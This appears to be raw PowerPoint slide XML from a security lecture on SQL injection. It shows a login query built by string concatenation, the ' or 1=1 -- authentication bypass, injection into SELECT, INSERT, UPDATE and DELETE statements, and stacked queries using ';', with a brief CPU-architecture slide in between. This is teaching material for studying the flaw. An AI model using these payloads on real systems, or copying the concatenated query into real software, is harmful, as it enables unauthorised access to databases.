                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    } else  { //else grant access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %&gt;  &lt;center&gt;ACCESS GRANTED&lt;/center&gt; &lt;% </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    // do stuff here ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78061329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4413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4413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4413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4413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4413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44131">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44131">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44131">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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944131">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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944131">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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944131">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>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944131">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6178" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="946179" name="Picture 3" descr="database"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1660525" y="1220788"/>
            <a:ext cx="5822950" cy="4416425"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273297118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461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8228" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or 1=1 --] Technique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="948229" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Given the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL query string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>pubs.guest.sa_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> \</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      where username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>+ username + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>and \</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>+ password + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"'";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By entering:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>or 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as the user name (and any password) results in the string:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sa_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> where username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>='' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>or 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>--' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>and password= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Parsed by the SQL server as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sa_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> username='' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>' and password= '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0" smtClean="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The conditional statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>username ='' or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is true whether or not username is equal to ''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The "--" makes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sure that the rest of the SQL statement is interpreted as a comment and therefore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>evaluated</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12907582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4822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4822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4822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4822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4822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4822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02" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Injecting SQL Into Different Types of Queries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection can modify any type of query such as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT * FROM accounts WHERE user=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’ AND pass=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>INSERT statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>INSERT INTO accounts (user, pass) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VALUES(‘${u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’, ‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that in this case</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> one has to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>figure out how many values to insert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPDATE statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPDATE accounts SET pass=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>np</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’ WHERE user= ‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’ AND pass=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DELETE statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DELETE * FROM accounts WHERE user=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419711819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6320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6320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6320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6320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6320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6320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6320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6320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6320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6320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Flashback to CPU Design</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Von Neumann Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Harvard Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1491706" y="2263761"/>
            <a:ext cx="2911353" cy="1684018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2263760"/>
            <a:ext cx="4114800" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>"Von Neumann Architecture" by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>Kapooht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> - Own work. Licensed under CC BY-SA 3.0 via Wikimedia Commons - http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>commons.wikimedia.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>/wiki/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>File:Von_Neumann_Architecture.svg#mediaviewer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>File:Von_Neumann_Architecture.svg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330714" y="4321165"/>
            <a:ext cx="3202464" cy="2037547"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="4433392"/>
            <a:ext cx="4114800" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>"Harvard architecture" by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>Nessa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> los - Own work. Licensed under CC BY-SA 3.0 via Wikimedia Commons - http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>commons.wikimedia.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>/wiki/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>File:Harvard_architecture.svg#mediaviewer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>File:Harvard_architecture.svg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362990528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Inject Different Queries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is the SQL query separator?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If the SQL server allows it, you can use ; to inject multiple, arbitrary, queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sa_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sa_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ('user', 'password') </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
